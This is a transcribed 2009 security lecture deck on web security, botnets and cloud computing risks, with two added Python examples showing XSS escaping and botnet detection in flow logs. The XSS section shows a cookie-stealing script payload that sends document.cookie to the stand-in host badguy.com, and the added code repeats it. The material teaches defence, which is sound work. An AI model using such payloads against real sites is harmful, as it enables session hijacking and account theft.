
Page 1: Trends and Selected Topics in Security Guo,Yuanxiong 2009.11.27

Trends and Selected Topics in Security

Guo, Yuanxiong, 2009.11.27

Page 2:

Outline

• Overview of Security and Trends

• Three Selected Topics
  – Web Security
  – Botnet
  – Security in Cloud Computing

Page 3:

So many security conferences and experts, but the reality is ……… we are getting more and more insecure!!!

Page 4:

Countries whose resources are used to host Malicious Programs in 2008 (From Kaspersky)

China was the absolute leader based on the number of attacks originating from resources located in the country!!!

Page 5:

Countries in which users were attacked in 2008 (From Kaspersky)

It comes as no surprise that China is again in top place!!!

Page 6:

What is Security?

• Most of computer science is concerned with achieving desired behavior

• Security is concerned with preventing undesired behavior
  – Different way of thinking!
  – An enemy who is actively and maliciously trying to circumvent any protective measures you put in place

Page 7:

Goals of Security

• Prevention
  – Prevent attackers from violating security policy

• Detection
  – Detect attackers’ violation of security policy

• Recovery
  – Stop attack, assess and repair damage

• Survivability
  – Continue to function correctly even if attack succeeds

Page 8:

Components of Security

• Confidentiality
  – Keeping data and resources hidden.

• Integrity
  – Preventing unauthorized changes to data or resources.

• Availability
  – Enabling access to data and resources.

Page 9:

Network Stacks

Layer-by-layer view of the stack, the protocols at each layer, and example attacks against each layer (reconstructed from the slide diagram):

Layer         Example protocols   Example attacks
people        -                   Phishing attacks, usability
application   email, Web, NFS     Sendmail, FTP, NFS bugs, chosen-protocol and version-rollback attacks
session       RPC                 RPC worms, portmapper exploits
transport     TCP                 SYN flooding, RIP attacks, sequence number prediction
network       IP                  IP smurfing and other address spoofing attacks
data link     802.11              WEP attacks
physical      RF                  RF fingerprinting, DoS

Page 10:

Research Methodology in the Security Community

• Mathematical Modeling: Machine Learning, Data Mining, Game Theory, Social Network Analysis, Graph Theory, Percolation Theory, Queuing Theory, etc.

• Systems: Virtual Machines, Operating Systems, Compilers, Programming Languages, Software Engineering, Reverse Engineering, etc.

Page 11:

Topics in Security Research

• Important, really existing, or urgent to be solved

• Three Selected Topics
  – Web Security
  – Botnet
  – Security in Cloud Computing

Page 12:

Web Security

Page 13:

Vulnerability Status: Web is ‘Winning’

Page 14:

Recent Website Security Statistics Report by WhiteHat Security Inc. (Nov. 12, 2009)

• 83% of websites have had at least one serious vulnerability

• 64% of websites currently have at least one serious vulnerability

• Web-based attacks are the mainstream

Page 15:

Web Application

• Many sensitive tasks are done through the web
  – Online banking, online shopping
  – Database access
  – System administration

• Ease of detection and exploitation of web vulnerabilities

• Large number of low-grade software applications written by inexperienced developers

• Web applications and web users are targets of many attacks
  – Cross-site scripting (XSS) (top 1 threat)
  – SQL injection
  – Cross-site request forgery
  – PHP remote file inclusion
  – Session hijacking
  – etc.

Page 16:

Cross-Site Scripting Overview

[Figure: three parties (Attack Server, Server Victim, User Victim) and the numbered flow of a reflected XSS attack]
  1. User visits web site (attack server)
  2. User receives malicious page
  3. User clicks on link (to server victim)
  4. Server victim echoes user input back to the user
  5. User’s browser sends valuable data to the attack server

Page 17:

The Setup

• User input is echoed into the HTML response.

• Example: search field
  – http://victim.com/search.php?term=apple

  – search.php responds with:

<HTML>
<TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET['term'] ?> :
. . .
</BODY>
</HTML>

• Is this exploitable?

Page 18:

Bad Input

• Problem: no validation of input term

• Consider link (properly URL encoded):
  http://victim.com/search.php?term=<script> window.open("http://badguy.com?cookie=" + document.cookie) </script>

• What if user clicks on this link?
  1. Browser goes to victim.com/search.php
  2. victim.com returns: <HTML> Results for <script> … </script>
  3. Browser executes script: sends cookie for victim.com to badguy.com

Page 19:

So What?

• Why would user click on such a link?
  – Phishing email in webmail client (e.g. gmail).
  – Link in double-click banner ad … many many ways to fool user into clicking

• What if badguy.com gets cookie for victim.com?
  – Cookie can include session auth for victim.com
  – Or other data intended only for victim.com
  – Violates same-origin policy

Page 20:

Much Worse

• Attacker can execute arbitrary scripts in browser

• Can manipulate any DOM component on victim.com
  – Control links on page
  – Control form fields (e.g. password field) on this page and linked pages.

• Example: MySpace.com phishing attack injects password field that sends password to bad guy.

Page 21:

Types of XSS vulnerabilities

• DOM-based (local)
  – Problem exists within a page’s client-side script

• Non-persistent (“reflected”)
  – Data provided by a Web client is used by server-side scripts to generate a page for that user

• Persistent (“stored”)
  – Data provided to an application is first stored and later displayed to users in a Web page
  – Potentially more serious if the page is rendered more than once
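Pages 17 to 21 walk through the reflected XSS in search.php, the session-cookie theft it enables, and the stored variant. The following Python example is added here and is not code from the original slides: it models the page's vulnerable echo beside an output-encoded version, a stored-comment variant of the same bug, and an HttpOnly session cookie as one way to limit what injected script can read through document.cookie. The function and class names (term_from_url, render_search_vulnerable, CommentStore, session_cookie_header), the URLs and the sample payload are assumptions constructed for this example.

```python
"""Reflected and stored XSS modelled on the slides' search.php, with the fix.

Added example, not code from the original slides. The vulnerable renderer
mirrors `Results for <?php echo $_GET[term] ?>`; the hardened one HTML-escapes
untrusted input before it is placed in the response body.
"""
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed sample payload, modelled on the slide's cookie-stealing link.
PAYLOAD = '<script>window.open("http://badguy.com?cookie=" + document.cookie)</script>'


def encode_search_url(term):
    """Build the 'properly URL encoded' link from page 18 (constructed host name)."""
    return "http://victim.com/search.php?term=" + quote(term)


def term_from_url(url):
    """Extract the `term` query parameter the way search.php would see it."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("term", [""])[0]


def render_search_vulnerable(term):
    """Page 17's search.php: user input is echoed straight into the HTML."""
    return f"<HTML><TITLE>Search Results</TITLE><BODY>Results for {term} :</BODY></HTML>"


def render_search_hardened(term):
    """Same page with output encoding: <, >, &, and quotes become entities,
    so browser never sees a script element, whatever the term contains."""
    safe = html.escape(term, quote=True)
    return f"<HTML><TITLE>Search Results</TITLE><BODY>Results for {safe} :</BODY></HTML>"


class CommentStore:
    """Stored ('persistent') XSS, page 21: input is saved unchanged and rendered
    later, potentially to every visitor of the page (hypothetical store)."""

    def __init__(self):
        self.comments = []

    def post(self, text):
        # Stored as received; encoding belongs at output time, in the renderer.
        self.comments.append(text)

    def render_vulnerable(self):
        return "".join(f"<p>{c}</p>" for c in self.comments)

    def render_hardened(self):
        return "".join(f"<p>{html.escape(c, quote=True)}</p>" for c in self.comments)


def contains_executable_script(page):
    """Crude check used only to show the difference: does a literal <script>
    tag survive into the response body?"""
    return "<script>" in page.lower()


def session_cookie_header(session_id):
    """Mitigation for page 19's 'cookie can include session auth': HttpOnly
    keeps document.cookie from exposing the session cookie to injected script,
    Secure keeps it off plaintext HTTP. Cookie name is an assumption."""
    return f"Set-Cookie: SESSIONID={session_id}; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    term = term_from_url(encode_search_url(PAYLOAD))
    print("vulnerable page carries script:", contains_executable_script(render_search_vulnerable(term)))
    print("hardened page carries script:  ", contains_executable_script(render_search_hardened(term)))
    print(session_cookie_header("constructed-session-id"))
```

The two renderers differ only in the html.escape call, which is the whole of the fix for both the reflected and the stored case: the store keeps the raw text, and the encoding is applied wherever the text is placed into HTML. The HttpOnly flag does not prevent the injection, it only removes the cookie from what the injected script can read, so it is a second layer rather than a substitute for output encoding.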

Page 22:

Botnet

Page 23:

Botnets

• Bots: autonomous programs performing tasks

• Botnets: group of bots

• Available for simultaneous control by bot masters

• A hybrid of many previous threats integrated with a command and control system.

• The root cause of a large number of security problems on the Internet.

Page 24:

Botnet Statistics

• By estimation, about 25% of all computers connected to the Internet in the world are infected bots controlled by attackers.

• Size: up to 1.4 million nodes (a real bot army!!!)

• 10 million bot computers were used to distribute spam and malware across the Internet each day

• Honeypot: gather information
  – Run unpatched version of Windows
  – Usually infected within 10 minutes.

Page 25:

Why Botnets Are So Attractive

• Larger damage: multiple computers grouped together to perform distributed attacks and bring down bigger targets.

• Hidden attacker: attack packets are sent from the bot rather than directly from the attacker.

• Money!!!!!

Page 26:

Botnet Application

Page 27:

One Example of a Botnet

1. Attacker launches worm, virus, or other mechanism to infect Windows machines.

2. Infected machines contact botnet controller via IRC.

3. Spammer (sponsor) pays attacker for use of botnet.

4. Spammer uses botnet to send spam emails.

Page 28:

Current Botnet Research

• Measuring the botnet (size, location, etc.)
  – Passive analysis of secondary effects caused by infected machines (spam, DNS queries, etc.).
  – Infiltration: join the botnet to perform analysis from the inside (using honeypots).

• Defending against the botnet
  – Cooperative behaviors
  – Signatures
  – Attack behaviors
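Pages 27 and 28 describe a spam botnet controlled over IRC and the passive measurement of its secondary effects. The following Python example is added here and is not code from the original slides: it scans constructed flow-log lines for two of the symptoms the slides name, a workstation opening SMTP connections to many distinct mail servers (spam sending) and an internal host connecting to an IRC port (the command-and-control channel of the page 27 example). The log format, the IP addresses, the thresholds, the mail-relay address and the IRC port list are assumptions made for this example.

```python
"""Passive detection of botnet 'secondary effects' in flow logs.

Added example, not code from the original slides. Input lines are constructed
for this example in the form "<time> <src_ip> <dst_ip> <dst_port> <proto>".
"""
from collections import defaultdict

# Constructed sample flows: 10.0.0.5 behaves like a spam bot, 10.0.0.9 talks to
# an IRC server, 10.0.0.7 and 10.0.0.8 behave normally.
SAMPLE_FLOWS = """\
10:00:01 10.0.0.5 203.0.113.10 25 tcp
10:00:02 10.0.0.5 203.0.113.11 25 tcp
10:00:02 10.0.0.5 198.51.100.7 25 tcp
10:00:03 10.0.0.5 198.51.100.8 25 tcp
10:00:04 10.0.0.5 192.0.2.20 25 tcp
10:00:05 10.0.0.5 192.0.2.21 25 tcp
10:00:06 10.0.0.9 192.0.2.99 6667 tcp
10:00:07 10.0.0.9 192.0.2.99 6667 tcp
10:00:08 10.0.0.7 10.0.0.2 25 tcp
10:00:09 10.0.0.7 93.184.216.34 443 tcp
10:00:10 10.0.0.8 93.184.216.34 80 tcp
"""

SMTP_PORT = 25
IRC_PORTS = {6667, 6697}          # assumption: the organisation runs no IRC service
SPAM_DISTINCT_SERVERS = 5         # assumption: 5+ distinct outside MTAs is not normal for a workstation
INTERNAL_PREFIX = "10."           # assumption: the internal address range
ALLOWED_MAIL_RELAY = "10.0.0.2"   # assumption: the only host workstations should send mail through


def parse_flows(text):
    """Turn log text into (src, dst, dport) tuples, skipping malformed lines."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        _, src, dst, dport, _ = parts
        if not dport.isdigit():
            continue
        flows.append((src, dst, int(dport)))
    return flows


def find_spam_bots(flows):
    """Internal hosts that open SMTP to many distinct servers other than the relay.
    Direct-to-MX delivery from a desktop is the 'spam' secondary effect of page 28."""
    servers = defaultdict(set)
    for src, dst, dport in flows:
        if dport == SMTP_PORT and src.startswith(INTERNAL_PREFIX) and dst != ALLOWED_MAIL_RELAY:
            servers[src].add(dst)
    return sorted(host for host, dsts in servers.items() if len(dsts) >= SPAM_DISTINCT_SERVERS)


def find_irc_clients(flows):
    """Internal hosts connecting to IRC ports, the C&C channel in the page 27 example."""
    return sorted({src for src, _, dport in flows
                   if dport in IRC_PORTS and src.startswith(INTERNAL_PREFIX)})


def report(text):
    """Run both heuristics over a log and return the flagged hosts."""
    flows = parse_flows(text)
    return {"spam_bots": find_spam_bots(flows), "irc_clients": find_irc_clients(flows)}


if __name__ == "__main__":
    print(report(SAMPLE_FLOWS))
```

Both heuristics are deliberately simple: they only look at where internal hosts connect, never at payload, which is what makes them usable on sampled flow records from a router. In practice the thresholds need tuning per network (a legitimate mail server would trip the SMTP rule, so it belongs on an allow list), and a hit is a lead for the honeypot-based analysis the slide describes, not a verdict on its own.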

Page 29:

Something New: Mobile Botnet (CCS ’09)

• The attack target: Home Location Register (HLR), a massive database that stores the details of every SIM card a cellular network operator issues and would typically contain details on up to 5 million subscribers.

• Research results show that a botnet of fewer than 12,000 infected cellphones could disrupt 93 per cent of traffic to an HLR of 1 million subscribers.

• World’s first iPhone virus surfaces!!! (Nov. 2009)

Page 30:

Security Issues in Cloud Computing

Page 31:

A Frequently Asked Question:

• Is cloud computing just reinventing the wheel?
  – Cluster Computing
  – Utility Computing
  – Software as a Service
  – Service Computing
  – etc.

• Still under debate, but the general consensus is that all those terms could be summarized under the umbrella of cloud computing

Page 32:

The Latest Working Definition (v15)

• ‘A pay-per-use model for enabling available, convenient and on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, services) that can be rapidly provisioned and released with minimal management effort or service provider interaction’ (From NIST)

• It promotes availability and is composed of five essential characteristics, three service models, and four deployment models.

Page 33:

Five Essential Characteristics

• On-demand self-service.

• Ubiquitous network access.

• Resource pooling

• Rapid elasticity

• Measured Service

Page 34:

Three Service Models

• Cloud Software as a Service
  – Use the provider’s applications over a network

• Cloud Platform as a Service
  – Deploy customer-created applications to a cloud

• Cloud Infrastructure as a Service
  – Rent processing, storage, network capacity, and other fundamental computing resources

Page 35:

Four Deployment Models

• Private cloud
  – Owned by a single enterprise

• Community cloud
  – Shared infrastructure for a specific community

• Public cloud
  – Available to the public and owned by an organization selling cloud services.

• Hybrid cloud
  – Composition of two or more clouds

Page 36:

Page 37:

Benefits of Cloud Computing

• Cost Savings
  – Set up and upgrade without huge expense for infrastructure purchase and maintenance; just pay as you go.

• Immediacy
  – Provision and utilize a service in a single day, compared to traditional IT projects
  – Business agility and reduction of the costs that come with time delay

• Availability
  – The infrastructures of cloud providers are often powerful and have good load-balancing policies.

Page 38:

Benefits of Cloud Computing (Cont’)

• Scalability
  – On-demand provisioning and implementation allow for traffic peaks.

• Efficiency
  – Shift maintenance activities to the cloud provider
  – Focus efforts on innovation, research and development

• Resiliency
  – Back-up solution given by cloud providers in disaster scenarios

Page 39:

Security is the Major Issue

Page 40:

Research Topics

• Building Trust in the Cloud
  – Effects of different forms of breach reporting on security
  – End-to-end data confidentiality in the cloud
  – Higher assurance clouds, Virtual Private Cloud, etc.

• Data Protection in Large-Scale Cross-Organization Systems
  – Forensics and evidence gathering mechanisms
  – Incident handling: monitoring and traceability
  – International differences in relevant regulations, including data protection and privacy

Page 41:

Research Topics (Cont’)

• Large Scale Computer Systems Engineering
  – Resource isolation mechanisms: data, processing, memory, logs, etc.
  – Interoperability between cloud providers
  – Resilience of cloud computing. How can the cloud improve resilience?

Page 42:

Current Findings

• It has been reported that on a current cloud computing provider’s platform (Amazon EC2), information leakage can arise from sharing physical infrastructure between mutually distrustful users, even when their actions are isolated through machine virtualization, as within a third-party cloud compute service.

• Many security problems need to be identified and solved before the age of cloud computing arrives!

Page 43:

Q&A